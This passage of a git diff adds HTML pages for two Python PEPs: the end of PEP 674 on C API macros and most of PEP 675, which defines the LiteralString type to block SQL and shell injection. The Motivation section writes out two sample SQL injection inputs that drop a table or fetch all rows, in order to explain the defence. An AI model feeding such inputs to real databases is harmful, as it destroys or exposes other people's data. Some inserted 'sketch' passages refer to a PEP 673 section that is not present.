In GraalVM, when a Python object is accessed by the Python C API, the C API +emulation layer has to wrap the GraalVM objects into wrappers that expose +the internal structure of the CPython structures (PyObject, PyLongObject, +PyTypeObject, etc). This is because when the C code accesses it directly or via +macros, all GraalVM can intercept is a read at the struct offset, which has +to be mapped back to the representation in GraalVM. The smaller the +“effective” number of exposed struct members (by replacing macros with +functions), the simpler GraalVM wrappers can be.

+

This PEP alone is not enough to get rid of the wrappers in GraalVM, but it +is a step towards this long term goal. GraalVM already supports HPy which is a better +solution in the long term.

+

These statements are endorsed by Tim Felgentreff (GraalVM Python developer).

+
+
+
+

Specification

+
+

Disallow using macros as l-values

+

The following 65 macros are modified to disallow using them as l-values.

+
+

PyObject and PyVarObject macros

+
    +
  • Py_TYPE(): Py_SET_TYPE() must be used instead
  • +
  • Py_SIZE(): Py_SET_SIZE() must be used instead
  • +
+
+
+

GET macros

+
    +
  • PyByteArray_GET_SIZE()
  • +
  • PyBytes_GET_SIZE()
  • +
  • PyCFunction_GET_CLASS()
  • +
  • PyCFunction_GET_FLAGS()
  • +
  • PyCFunction_GET_FUNCTION()
  • +
  • PyCFunction_GET_SELF()
  • +
  • PyCell_GET()
  • +
  • PyCode_GetNumFree()
  • +
  • PyDict_GET_SIZE()
  • +
  • PyFunction_GET_ANNOTATIONS()
  • +
  • PyFunction_GET_CLOSURE()
  • +
  • PyFunction_GET_CODE()
  • +
  • PyFunction_GET_DEFAULTS()
  • +
  • PyFunction_GET_GLOBALS()
  • +
  • PyFunction_GET_KW_DEFAULTS()
  • +
  • PyFunction_GET_MODULE()
  • +
  • PyHeapType_GET_MEMBERS()
  • +
  • PyInstanceMethod_GET_FUNCTION()
  • +
  • PyList_GET_SIZE()
  • +
  • PyMemoryView_GET_BASE()
  • +
  • PyMemoryView_GET_BUFFER()
  • +
  • PyMethod_GET_FUNCTION()
  • +
  • PyMethod_GET_SELF()
  • +
  • PySet_GET_SIZE()
  • +
  • PyTuple_GET_SIZE()
  • +
  • PyUnicode_GET_DATA_SIZE()
  • +
  • PyUnicode_GET_LENGTH()
  • +
  • PyUnicode_GET_SIZE()
  • +
  • PyWeakref_GET_OBJECT()
  • +
+
+
+

AS macros

+
    +
  • PyByteArray_AS_STRING()
  • +
  • PyBytes_AS_STRING()
  • +
  • PyFloat_AS_DOUBLE()
  • +
  • PyUnicode_AS_DATA()
  • +
  • PyUnicode_AS_UNICODE()
  • +
+
+
+

PyUnicode macros

+
    +
  • PyUnicode_1BYTE_DATA()
  • +
  • PyUnicode_2BYTE_DATA()
  • +
  • PyUnicode_4BYTE_DATA()
  • +
  • PyUnicode_DATA()
  • +
  • PyUnicode_IS_ASCII()
  • +
  • PyUnicode_IS_COMPACT()
  • +
  • PyUnicode_IS_READY()
  • +
  • PyUnicode_KIND()
  • +
  • PyUnicode_READ()
  • +
  • PyUnicode_READ_CHAR()
  • +
+
+
+

PyDateTime GET macros

+
    +
  • PyDateTime_DATE_GET_FOLD()
  • +
  • PyDateTime_DATE_GET_HOUR()
  • +
  • PyDateTime_DATE_GET_MICROSECOND()
  • +
  • PyDateTime_DATE_GET_MINUTE()
  • +
  • PyDateTime_DATE_GET_SECOND()
  • +
  • PyDateTime_DATE_GET_TZINFO()
  • +
  • PyDateTime_DELTA_GET_DAYS()
  • +
  • PyDateTime_DELTA_GET_MICROSECONDS()
  • +
  • PyDateTime_DELTA_GET_SECONDS()
  • +
  • PyDateTime_GET_DAY()
  • +
  • PyDateTime_GET_MONTH()
  • +
  • PyDateTime_GET_YEAR()
  • +
  • PyDateTime_TIME_GET_FOLD()
  • +
  • PyDateTime_TIME_GET_HOUR()
  • +
  • PyDateTime_TIME_GET_MICROSECOND()
  • +
  • PyDateTime_TIME_GET_MINUTE()
  • +
  • PyDateTime_TIME_GET_SECOND()
  • +
  • PyDateTime_TIME_GET_TZINFO()
  • +
+
+
+
+

Port C extensions to Python 3.11

+

In practice, the majority of projects affected by this PEP only have to make two changes:

+
    +
  • Replace Py_TYPE(obj) = new_type +with Py_SET_TYPE(obj, new_type).
  • +
  • Replace Py_SIZE(obj) = new_size +with Py_SET_SIZE(obj, new_size).
  • +
+

The pythoncapi_compat project can be used to automatically update C extensions: add Python 3.11 support without losing support for older Python versions. The project provides a header file which supplies the Py_SET_REFCNT(), Py_SET_TYPE() and Py_SET_SIZE() functions on Python 3.8 and older.

+
+
+

PyTuple_GET_ITEM() and PyList_GET_ITEM() are left unchanged

+

The PyTuple_GET_ITEM() and PyList_GET_ITEM() macros are left +unchanged.

+

The code patterns &PyTuple_GET_ITEM(tuple, 0) and +&PyList_GET_ITEM(list, 0) are still commonly used to get access to +the inner PyObject** array.

+

Changing these macros is out of the scope of this PEP.

+
+
+

PyDescr_NAME() and PyDescr_TYPE() are left unchanged

+

The PyDescr_NAME() and PyDescr_TYPE() macros are left unchanged.

+

These macros give access to PyDescrObject.d_name and +PyDescrObject.d_type members. They can be used as l-values to set +these members.

+

The SWIG project uses these macros as l-values to set these members. It +would be possible to modify SWIG to prevent setting PyDescrObject +structure members directly, but it is not really worth it since the +PyDescrObject structure is not performance critical and is unlikely +to change soon.

+

See the bpo-46538 “[C API] Make +the PyDescrObject structure opaque: PyDescr_NAME() and PyDescr_TYPE()” +issue for more details.

+
+
+
+

Implementation

+

The implementation is tracked by bpo-45476: [C API] PEP 674: Disallow +using macros as l-values.

+
+

Py_TYPE() and Py_SIZE() macros

+

In May 2020, the Py_TYPE() and Py_SIZE() macros have been +modified to disallow using them as l-values (Py_TYPE, +Py_SIZE).

+

In November 2020, the change was reverted, +since it broke too many third party projects.

+

In June 2021, once most third party projects were updated, a second attempt was made, but it had to be reverted again, since it broke test_exceptions on Windows.

+

In September 2021, once test_exceptions had been fixed, Py_TYPE() and Py_SIZE() were finally changed.

+

In November 2021, this backward incompatible change got a +Steering Council exception.

+

In October 2022, Python 3.11 was released with the incompatible Py_TYPE() and Py_SIZE() changes.

+
+
+
+

Backwards Compatibility

+

The proposed C API changes are backward incompatible on purpose.

+

In practice, only Py_TYPE() and Py_SIZE() macros are used as +l-values.

+

This change does not follow the PEP 387 deprecation process. There is +no known way to emit a deprecation warning only when a macro is used as +an l-value, but not when it’s used differently (ex: as a r-value).

+

The following 4 macros are left unchanged to reduce the number of +affected projects: PyDescr_NAME(), PyDescr_TYPE(), +PyList_GET_ITEM() and PyTuple_GET_ITEM().

+
+

Statistics

+

In total (projects on PyPI and not on PyPI), 34 projects are known to be +affected by this PEP:

+
    +
  • 16 projects (47%) are already fixed
  • +
  • 18 projects (53%) are not fixed yet +(pending fix or have to regenerate their Cython code)
  • +
+

As of September 1, 2022, the PEP affected 18 projects (0.4%) of the top 5000 PyPI projects:

+
    +
  • 15 projects (0.3%) have to regenerate their Cython code
  • +
  • 3 projects (0.1%) have a pending fix
  • +
+
+
+

Top 5000 PyPI

+

Projects with a pending fix (3):

+
    +
  • datatable (1.0.0): +fixed
  • +
  • guppy3 (3.1.2): +fixed
  • +
  • scipy (1.9.3): need to update boost python
  • +
+

Moreover, 15 projects have to regenerate their Cython code.

+

Projects released with a fix (12):

+ +

There are also two backport projects which are affected by this PEP:

+
    +
  • pickle5 (0.0.12): backport for Python <= 3.7
  • +
  • pysha3 (1.0.2): backport for Python <= 3.5
  • +
+

They must not be used and cannot be used on Python 3.11.

+
+
+

Other affected projects

+

Other projects released with a fix (4):

+
    +
  • boost (1.78.0): +commit
  • +
  • breezy (3.2.1): +bug report
  • +
  • duplicity (0.8.18): +commit
  • +
  • gobject-introspection (1.70.0): +MR
  • +
+
+
+
+

Relationship with the HPy project

+
+

The HPy project

+

The hope with the HPy project is to provide a C API that is close +to the original API—to make porting easy—and have it perform as close to +the existing API as possible. At the same time, HPy is sufficiently +removed to be a good “C extension API” (as opposed to a stable subset of +the CPython implementation API) that does not leak implementation +details. To ensure this latter property, the HPy project tries to +develop everything in parallel for CPython, PyPy, and GraalVM Python.

+

HPy is still evolving very fast. Issues are still being solved while +migrating NumPy, and work has begun on adding support for HPy to Cython. Work on +pybind11 is starting soon. Tim Felgentreff believes by the time HPy has +these users of the existing C API working, HPy should be in a state +where it is generally useful and can be deemed stable enough that +further development can follow a more stable process.

+

In the long run the HPy project would like to become a promoted API to +write Python C extensions.

+

The HPy project is a good solution for the long term. It has the +advantage of being developed outside Python and it doesn’t require any C +API change.

+
+
+

The C API is here to stay for a few more years

+

The first concern about HPy is that, right now, HPy is neither mature nor widely used, and CPython still has to continue supporting a large number of C extensions which are not likely to be ported to HPy soon.

+

The second concern is the inability to evolve CPython internals to implement new optimizations, and the inefficient implementation of the current C API in PyPy, GraalPython, etc. Sadly, HPy will only solve these problems once most C extensions have been fully ported to HPy: when it becomes reasonable to consider dropping the “legacy” Python C API.

+

While porting a C extension to HPy can be done incrementally on CPython, it requires modifying a lot of code and takes time. Porting most C extensions to HPy is expected to take a few years.

+

This PEP proposes to make the C API “less bad” by fixing one problem which is clearly identified as causing practical issues: macros used as l-values. This PEP only requires updating a minority of C extensions, and usually only a few lines need to be changed in impacted extensions.

+

For example, NumPy 1.22 is made of 307,300 lines of C code, and adapting NumPy to this PEP only required modifying 11 lines (to use Py_SET_TYPE and Py_SET_SIZE) and adding 4 lines (to define Py_SET_TYPE and Py_SET_SIZE for Python 3.8 and older). The beginnings of the NumPy port to HPy already required modifying more lines than that.

+

Right now, it’s hard to say which approach is best: fixing the current C API, or focusing on HPy. It would be risky to focus only on HPy.

+
+
+
+

Rejected Idea: Leave the macros as they are

+

The documentation of each function can discourage developers from using macros to modify Python objects.

+

If there is a need to make an assignment, a setter function can be added, and the macro documentation can require using it. For example, a Py_SET_TYPE() function was added in Python 3.9, and the Py_TYPE() documentation now requires using the Py_SET_TYPE() function to set an object type.

+

If developers use macros as an l-value, it’s their responsibility when +their code breaks, not Python’s responsibility. We are operating under +the consenting adults principle: we expect users of the Python C API to +use it as documented and expect them to take care of the fallout, if +things break when they don’t.

+

This idea was rejected because only a few developers read the documentation, and only a minority tracks changes to the Python C API documentation. The majority of developers only use CPython and so are not aware of compatibility issues with other Python implementations.

+

Moreover, continuing to allow using macros as an l-value does not help +the HPy project, and leaves the burden of emulating them on GraalVM’s +Python implementation.

+
+
+

Macros already modified

+

The following C API macros have already been modified to disallow using +them as l-value:

+
    +
  • PyCell_SET()
  • +
  • PyList_SET_ITEM()
  • +
  • PyTuple_SET_ITEM()
  • +
  • Py_REFCNT() (Python 3.10): Py_SET_REFCNT() must be used
  • +
  • _PyGCHead_SET_FINALIZED()
  • +
  • _PyGCHead_SET_NEXT()
  • +
  • asdl_seq_GET()
  • +
  • asdl_seq_GET_UNTYPED()
  • +
  • asdl_seq_LEN()
  • +
  • asdl_seq_SET()
  • +
  • asdl_seq_SET_UNTYPED()
  • +
+

For example, PyList_SET_ITEM(list, 0, item) < 0 now fails with a +compiler error as expected.

+
+
+

Post History

+ +
+
+

References

+ +
+
+

Version History

+
    +
  • Version 3: No longer change PyDescr_TYPE() and PyDescr_NAME() macros
  • +
  • Version 2: Add “Relationship with the HPy project” section, remove +the PyPy section
  • +
  • Version 1: First public version
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0674.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+
\ No newline at end of file diff --git a/pep-0675/index.html b/pep-0675/index.html new file mode 100644 index 00000000000..f5f73575c96 --- /dev/null +++ b/pep-0675/index.html @@ -0,0 +1,1307 @@
+
PEP 675 – Arbitrary Literal String Type | peps.python.org
+
+
+


+ + +
+
+
+

PEP 675 – Arbitrary Literal String Type

+
+
Author:
+
Pradeep Kumar Srinivasan <gohanpra at gmail.com>, Graham Bleaney <gbleaney at gmail.com>
+
Sponsor:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Typing-SIG thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
30-Nov-2021
+
Python-Version:
+
3.11
+
Post-History:
+
07-Feb-2022
+
Resolution:
+
Python-Dev message
+
+
+
+
+
+

Attention

+

This PEP is a historical document: see LiteralString and +typing.LiteralString for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+


+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

There is currently no way to specify, using type annotations, that a +function parameter can be of any literal string type. We have to +specify a precise literal string type, such as +Literal["foo"]. This PEP introduces a supertype of literal string +types: LiteralString. This allows a function to accept arbitrary +literal string types, such as Literal["foo"] or +Literal["bar"].

+
+
+

Motivation

+

Powerful APIs that execute SQL or shell commands often recommend that +they be invoked with literal strings, rather than arbitrary user +controlled strings. There is no way to express this recommendation in +the type system, however, meaning security vulnerabilities sometimes +occur when developers fail to follow it. For example, a naive way to +look up a user record from a database is to accept a user id and +insert it into a predefined SQL query:

+
def query_user(conn: Connection, user_id: str) -> User:
+    query = f"SELECT * FROM data WHERE user_id = {user_id}"
+    conn.execute(query)
+    ...  # Transform data to a User object and return it
+
+query_user(conn, "user123")  # OK.
+
+
+

However, the user-controlled data user_id is being mixed with the +SQL command string, which means a malicious user could run arbitrary +SQL commands:

+
 # Delete the table.
+ query_user(conn, "user123; DROP TABLE data;")
+
+ # Fetch all users (since 1 = 1 is always true).
+ query_user(conn, "user123 OR 1 = 1")
+
+
+

To prevent such SQL injection attacks, SQL APIs offer parameterized +queries, which separate the executed query from user-controlled data +and make it impossible to run arbitrary queries. For example, with +sqlite3, our +original function would be written safely as a query with parameters:

+
def query_user(conn: Connection, user_id: str) -> User:
+    query = "SELECT * FROM data WHERE user_id = ?"
+    conn.execute(query, (user_id,))
+    ...
+
+
+

The problem is that there is no way to enforce this +discipline. sqlite3’s own documentation can only admonish +the reader to not dynamically build the sql argument from external +input; the API’s authors cannot express that through the type +system. Users can (and often do) still use a convenient f-string as +before and leave their code vulnerable to SQL injection.

+

Existing tools, such as the popular security linter Bandit, +attempt to detect unsafe external data used in SQL APIs, by inspecting +the AST or by other semantic pattern-matching. These tools, however, +preclude common idioms like storing a large multi-line query in a +variable before executing it, adding literal string modifiers to the +query based on some conditions, or transforming the query string using +a function. (We survey existing tools in the Rejected Alternatives +section.) For example, many tools will detect a false positive issue +in this benign snippet:

+
def query_data(conn: Connection, user_id: str, limit: bool) -> None:
+    query = """
+        SELECT
+            user.name,
+            user.age
+        FROM data
+        WHERE user_id = ?
+    """
+    if limit:
+        query += " LIMIT 1"
+
+    conn.execute(query, (user_id,))
+
+
+

We want to forbid harmful execution of user-controlled data while +still allowing benign idioms like the above and not requiring extra +user work.

+

To meet this goal, we introduce the LiteralString type, which only +accepts string values that are known to be made of literals. This is a +generalization of the Literal["foo"] type from PEP 586. +A string of type +LiteralString cannot contain user-controlled data. Thus, any API +that only accepts LiteralString will be immune to injection +vulnerabilities (with pragmatic limitations).

+

Since we want the sqlite3 execute method to disallow strings +built with user input, we would make its typeshed stub +accept a sql query that is of type LiteralString:

+
from typing import LiteralString
+
+def execute(self, sql: LiteralString, parameters: Iterable[str] = ...) -> Cursor: ...
+
+
+

This successfully forbids our unsafe SQL example. The variable +query below is inferred to have type str, since it is created +from a format string using user_id, and cannot be passed to +execute:

+
def query_user(conn: Connection, user_id: str) -> User:
+    query = f"SELECT * FROM data WHERE user_id = {user_id}"
+    conn.execute(query)  # Error: Expected LiteralString, got str.
+    ...
+
+
+

The method remains flexible enough to allow our more complicated +example:

+
def query_data(conn: Connection, user_id: str, limit: bool) -> None:
+    # This is a literal string.
+    query = """
+        SELECT
+            user.name,
+            user.age
+        FROM data
+        WHERE user_id = ?
+    """
+
+    if limit:
+        # Still has type LiteralString because we added a literal string.
+        query += " LIMIT 1"
+
+    conn.execute(query, (user_id,))  # OK
+
+
+

Notice that the user did not have to change their SQL code at all. The +type checker was able to infer the literal string type and complain +only in case of violations.

+

LiteralString is also useful in other cases where we want strict +command-data separation, such as when building shell commands or when +rendering a string into an HTML response without escaping (see +Appendix A: Other Uses). Overall, this combination of strictness +and flexibility makes it easy to enforce safer API usage in sensitive +code without burdening users.

+
+

Usage statistics

+

In a sample of open-source projects using sqlite3, we found that conn.execute was called ~67% of the time with a safe string literal and ~33% of the time with a potentially unsafe, local string variable. Using this PEP’s literal string type along with a type checker would prevent the unsafe portion of that 33% of cases (i.e., the ones where user-controlled data is incorporated into the query), while seamlessly allowing the safe ones to remain.

+
+
+
+

Rationale

+

Firstly, why use types to prevent security vulnerabilities?

+

Warning users in documentation is insufficient - most users either +never see these warnings or ignore them. Using an existing dynamic or +static analysis approach is too restrictive - these prevent natural +idioms, as we saw in the Motivation section (and will discuss more +extensively in the Rejected Alternatives section). The typing-based +approach in this PEP strikes a user-friendly balance between +strictness and flexibility.

+

Runtime approaches do not work because, at runtime, the query string +is a plain str. While we could prevent some exploits using +heuristics, such as regex-filtering for obviously malicious payloads, +there will always be a way to work around them (perfectly +distinguishing good and bad queries reduces to the halting problem).

+

Static approaches, such as checking the AST to see if the query string +is a literal string expression, cannot tell when a string is assigned +to an intermediate variable or when it is transformed by a benign +function. This makes them overly restrictive.

+

The type checker, surprisingly, does better than both because it has +access to information not available in the runtime or static analysis +approaches. Specifically, the type checker can tell us whether an +expression has a literal string type, say Literal["foo"]. The type +checker already propagates types across variable assignments or +function calls.

+

In the current type system itself, if the SQL or shell command +execution function only accepted three possible input strings, our job +would be done. We would just say:

+
def execute(query: Literal["foo", "bar", "baz"]) -> None: ...
+
+
+

But, of course, execute can accept any possible query. How do we +ensure that the query does not contain an arbitrary, user-controlled +string?

+

We want to specify that the value must be of some type +Literal[<...>] where <...> is some string. This is what +LiteralString represents. LiteralString is the “supertype” of +all literal string types. In effect, this PEP just introduces a type +in the type hierarchy between Literal["foo"] and str. Any +particular literal string, such as Literal["foo"] or +Literal["bar"], is compatible with LiteralString, but not the +other way around. The “supertype” of LiteralString itself is +str. So, LiteralString is compatible with str, but not the +other way around.

+

Note that a Union of literal types is naturally compatible with +LiteralString because each element of the Union is individually +compatible with LiteralString. So, Literal["foo", "bar"] is +compatible with LiteralString.

+

However, recall that we don’t just want to represent exact literal +queries. We also want to support composition of two literal strings, +such as query + " LIMIT 1". This too is possible with the above +concept. If x and y are two values of type LiteralString, +then x + y will also be of type compatible with +LiteralString. We can reason about this by looking at specific +instances such as Literal["foo"] and Literal["bar"]; the value +of the added string x + y can only be "foobar", which has type +Literal["foobar"] and is thus compatible with +LiteralString. The same reasoning applies when x and y are +unions of literal types; the result of pairwise adding any two literal +types from x and y respectively is a literal type, which means +that the overall result is a Union of literal types and is thus +compatible with LiteralString.

+

In this way, we are able to leverage Python’s concept of a Literal +string type to specify that our API can only accept strings that are +known to be constructed from literals. More specific details follow in +the remaining sections.

+
+
+

Specification

+
+

Runtime Behavior

+

We propose adding LiteralString to typing.py, with an +implementation similar to typing.NoReturn.

+
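A minimal sketch of such a special form, mirroring the Self implementation shown in PEP 673 above (the exact code in typing.py may differ):
+
@_SpecialForm
+def LiteralString(self, params):
+    """Represents an arbitrary literal string.
+
+    Example::
+
+      from typing import LiteralString
+
+      def run_query(sql: LiteralString) -> None: ...
+
+    """
+    raise TypeError(f"{self} is not subscriptable")
+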

Note that LiteralString is a special form used solely for type +checking. There is no expression for which type(<expr>) will +produce LiteralString at runtime. So, we do not specify in the +implementation that it is a subclass of str.

+
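As a small hedged sketch of this runtime inertness, values annotated as LiteralString are ordinary str objects when the program runs:
+
from typing import LiteralString  # Python 3.11+; typing_extensions for older versions
+
+def greet(name: LiteralString) -> str:
+    return "Hello, " + name
+
+msg = greet("world")  # accepted by the type checker
+print(type(msg))      # <class 'str'>; LiteralString never appears at runtime
+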
+
+

Valid Locations for LiteralString

+

LiteralString can be used where any other type can be used:

+
variable_annotation: LiteralString
+
+def my_function(literal_string: LiteralString) -> LiteralString: ...
+
+class Foo:
+    my_attribute: LiteralString
+
+type_argument: List[LiteralString]
+
+T = TypeVar("T", bound=LiteralString)
+
+
+

It cannot be nested within unions of Literal types:

+
bad_union: Literal["hello", LiteralString]  # Not OK
+bad_nesting: Literal[LiteralString]  # Not OK
+
+
+
+
+

Type Inference

+
+

Inferring LiteralString

+

Any literal string type is compatible with LiteralString. For +example, x: LiteralString = "foo" is valid because "foo" is +inferred to be of type Literal["foo"].

+

As per the Rationale, we also infer LiteralString in the +following cases:

+
    +
  • Addition: x + y is of type LiteralString if both x and +y are compatible with LiteralString.
  • +
  • Joining: sep.join(xs) is of type LiteralString if sep’s +type is compatible with LiteralString and xs’s type is +compatible with Iterable[LiteralString].
  • +
  • In-place addition: If s has type LiteralString and x has +type compatible with LiteralString, then s += x preserves +s’s type as LiteralString.
  • +
  • String formatting: An f-string has type LiteralString if and only +if its constituent expressions are literal strings. s.format(...) +has type LiteralString if and only if s and the arguments have +types compatible with LiteralString.
  • +
  • Literal-preserving methods: In Appendix C, +we have provided an exhaustive list of str methods that preserve the +LiteralString type.
  • +
+

In all other cases, if one or more of the composed values has a +non-literal type str, the composition of types will have type +str. For example, if s has type str, then "hello" + s +has type str. This matches the pre-existing behavior of type +checkers.

+

LiteralString is compatible with the type str. It inherits all +methods from str. So, if we have a variable s of type +LiteralString, it is safe to write s.startswith("hello").

+

Some type checkers refine the type of a string when doing an equality +check:

+
def foo(s: str) -> None:
+    if s == "bar":
+        reveal_type(s)  # => Literal["bar"]
+
+
+

Such a refined type in the if-block is also compatible with +LiteralString because its type is Literal["bar"].

+
+
+

Examples

+

See the examples below to help clarify the above rules:

+
literal_string: LiteralString
+s: str = literal_string  # OK
+
+literal_string: LiteralString = s  # Error: Expected LiteralString, got str.
+literal_string: LiteralString = "hello"  # OK
+
+
+

Addition of literal strings:

+
def expect_literal_string(s: LiteralString) -> None: ...
+
+expect_literal_string("foo" + "bar")  # OK
+expect_literal_string(literal_string + "bar")  # OK
+
+literal_string2: LiteralString
+expect_literal_string(literal_string + literal_string2)  # OK
+
+plain_string: str
+expect_literal_string(literal_string + plain_string)  # Not OK.
+
+
+

Join using literal strings:

+
expect_literal_string(",".join(["foo", "bar"]))  # OK
+expect_literal_string(literal_string.join(["foo", "bar"]))  # OK
+expect_literal_string(literal_string.join([literal_string, literal_string2]))  # OK
+
+xs: List[LiteralString]
+expect_literal_string(literal_string.join(xs)) # OK
+expect_literal_string(plain_string.join([literal_string, literal_string2]))
+# Not OK because the separator has type 'str'.
+
+
+

In-place addition using literal strings:

+
literal_string += "foo"  # OK
+literal_string += literal_string2  # OK
+literal_string += plain_string # Not OK
+
+
+

Format strings using literal strings:

+
literal_name: LiteralString
+expect_literal_string(f"hello {literal_name}")
+# OK because it is composed from literal strings.
+
+expect_literal_string("hello {}".format(literal_name))  # OK
+
+expect_literal_string(f"hello")  # OK
+
+username: str
+expect_literal_string(f"hello {username}")
+# NOT OK. The format-string is constructed from 'username',
+# which has type 'str'.
+
+expect_literal_string("hello {}".format(username))  # Not OK
+
+
+

Other literal types, such as literal integers, are not compatible with LiteralString:

+
some_int: int
+expect_literal_string(some_int)  # Error: Expected LiteralString, got int.
+
+literal_one: Literal[1] = 1
+expect_literal_string(literal_one)  # Error: Expected LiteralString, got Literal[1].
+
+
+

We can call functions on literal strings:

+
def add_limit(query: LiteralString) -> LiteralString:
+    return query + " LIMIT = 1"
+
+def my_query(query: LiteralString, user_id: str) -> None:
+    sql_connection().execute(add_limit(query), (user_id,))  # OK
+
+
+

Conditional statements and expressions work as expected:

+
def return_literal_string() -> LiteralString:
+    return "foo" if condition1() else "bar"  # OK
+
+def return_literal_str2(literal_string: LiteralString) -> LiteralString:
+    return "foo" if condition1() else literal_string  # OK
+
+def return_literal_str3() -> LiteralString:
+    if condition1():
+        result: Literal["foo"] = "foo"
+    else:
+        result: LiteralString = "bar"
+
+    return result  # OK
+
+
+
+
+

Interaction with TypeVars and Generics

+

TypeVars can be bound to LiteralString:

+
from typing import Literal, LiteralString, TypeVar
+
+TLiteral = TypeVar("TLiteral", bound=LiteralString)
+
+def literal_identity(s: TLiteral) -> TLiteral:
+    return s
+
+hello: Literal["hello"] = "hello"
+y = literal_identity(hello)
+reveal_type(y)  # => Literal["hello"]
+
+s: LiteralString
+y2 = literal_identity(s)
+reveal_type(y2)  # => LiteralString
+
+s_error: str
+literal_identity(s_error)
+# Error: Expected TLiteral (bound to LiteralString), got str.
+
+
+

LiteralString can be used as a type argument for generic classes:

+
class Container(Generic[T]):
+    def __init__(self, value: T) -> None:
+        self.value = value
+
+literal_string: LiteralString = "hello"
+x: Container[LiteralString] = Container(literal_string)  # OK
+
+s: str
+x_error: Container[LiteralString] = Container(s)  # Not OK
+
+
+

Standard containers like List work as expected:

+
xs: List[LiteralString] = ["foo", "bar", "baz"]
+
+
+
+
+

Interactions with Overloads

+

Literal strings and overloads do not need to interact in a special +way: the existing rules work fine. LiteralString can be used as a +fallback overload where a specific Literal["foo"] type does not +match:

+
@overload
+def foo(x: Literal["foo"]) -> int: ...
+@overload
+def foo(x: LiteralString) -> bool: ...
+@overload
+def foo(x: str) -> str: ...
+
+x1: int = foo("foo")  # First overload.
+x2: bool = foo("bar")  # Second overload.
+s: str
+x3: str = foo(s)  # Third overload.
+
+
+
+
+
+
+

Backwards Compatibility

+

We propose adding typing_extensions.LiteralString for use in +earlier Python versions.

+

As PEP 586 mentions, +type checkers “should feel free to experiment with more sophisticated +inference techniques”. So, if the type checker infers a literal string +type for an unannotated variable that is initialized with a literal +string, the following example should be OK:

+
x = "hello"
+expect_literal_string(x)
+# OK, because x is inferred to have type 'Literal["hello"]'.
+
+
+

This enables precise type checking of idiomatic SQL query code without +annotating the code at all (as seen in the Motivation section +example).

+

However, like PEP 586, this PEP does not mandate the above inference +strategy. In case the type checker doesn’t infer x to have type +Literal["hello"], users can aid the type checker by explicitly +annotating it as x: LiteralString:

+
x: LiteralString = "hello"
+expect_literal_string(x)
+
+
+
+
+

Rejected Alternatives

+
+

Why not use tool X?

+

Tools to catch issues such as SQL injection seem to come in three +flavors: AST based, function level analysis, and taint flow analysis.

+

AST-based tools: Bandit +has a plugin to warn when SQL queries are not literal +strings. The problem is that many perfectly safe SQL +queries are dynamically built out of string literals, as shown in the +Motivation section. At the +AST level, the resultant SQL query is not going to appear as a string +literal anymore and is thus indistinguishable from a potentially +malicious string. To use these tools would require significantly +restricting developers’ ability to build SQL queries. LiteralString +can provide similar safety guarantees with fewer restrictions.

+

Semgrep and pyanalyze: Semgrep supports a more sophisticated +function level analysis, including constant propagation +within a function. This allows us to prevent injection attacks while +permitting some forms of safe dynamic SQL queries within a +function. pyanalyze +has a similar extension. But neither handles function calls that +construct and return safe SQL queries. For example, in the code sample +below, build_insert_query is a helper function to create a query +that inserts multiple values into the corresponding columns. Semgrep +and pyanalyze forbid this natural usage whereas LiteralString +handles it with no burden on the programmer:

+
def build_insert_query(
+    table: LiteralString,
+    insert_columns: Iterable[LiteralString],
+) -> LiteralString:
+    sql = "INSERT INTO " + table
+
+    column_clause = ", ".join(insert_columns)
+    value_clause = ", ".join(["?"] * len(insert_columns))
+
+    sql += f" ({column_clause}) VALUES ({value_clause})"
+    return sql
+
+def insert_data(
+    conn: Connection,
+    kvs_to_insert: Dict[LiteralString, str]
+) -> None:
+    query = build_insert_query("data", kvs_to_insert.keys())
+    conn.execute(query, kvs_to_insert.values())
+
+# Example usage
+data_to_insert = {
+    "column_1": value_1,  # Note: values are not literals
+    "column_2": value_2,
+    "column_3": value_3,
+}
+insert_data(conn, data_to_insert)
+
+
+

Taint flow analysis: Tools such as Pysa or CodeQL are capable of tracking data flowing +from a user controlled input into a SQL query. These tools are +powerful but involve considerable overhead in setting up the tool in +CI, defining “taint” sinks and sources, and teaching developers how to +use them. They also usually take longer to run than a type checker +(minutes instead of seconds), which means feedback is not +immediate. Finally, they move the burden of preventing vulnerabilities +on to library users instead of allowing the libraries themselves to +specify precisely how their APIs must be called (as is possible with +LiteralString).

+

One final reason to prefer using a new type over a dedicated tool is +that type checkers are more widely used than dedicated security +tooling; for example, MyPy was downloaded over 7 million times in Jan 2022 vs less than +2 million times for +Bandit. Having security protections built right into type checkers +will mean that more developers benefit from them.

+
+
+

Why not use a NewType for str?

+

Any API for which LiteralString would be suitable could instead be +updated to accept a different type created within the Python type +system, such as NewType("SafeSQL", str):

+
SafeSQL = NewType("SafeSQL", str)
+
+def execute(self, sql: SafeSQL, parameters: Iterable[str] = ...) -> Cursor: ...
+
+execute(SafeSQL("SELECT * FROM data WHERE user_id = ?"), user_id)  # OK
+
+user_query: str
+execute(user_query)  # Error: Expected SafeSQL, got str.
+
+
+

Having to create a new type to call an API might give some developers +pause and encourage more caution, but it doesn’t guarantee that +developers won’t just turn a user controlled string into the new type, +and pass it into the modified API anyway:

+
query = f"SELECT * FROM data WHERE user_id = f{user_id}"
+execute(SafeSQL(query))  # No error!
+
+
+

We are back to square one with the problem of preventing arbitrary +inputs to SafeSQL. This is not a theoretical concern +either. Django uses the above approach with SafeString and +mark_safe. Issues +such as CVE-2020-13596 +show how this technique can fail.

+

Also note that this requires invasive changes to the source code +(wrapping the query with SafeSQL) whereas LiteralString +requires no such changes. Users can remain oblivious to it as long as +they pass in literal strings to sensitive APIs.

+
+
+

Why not try to emulate Trusted Types?

+

Trusted Types is a W3C +specification for preventing DOM-based Cross Site Scripting (XSS). XSS +occurs when dangerous browser APIs accept raw user-controlled +strings. The specification modifies these APIs to accept only the +“Trusted Types” returned by designated sanitizing functions. These +sanitizing functions must take in a potentially malicious string and +validate it or render it benign somehow, for example by verifying that +it is a valid URL or HTML-encoding it.

+

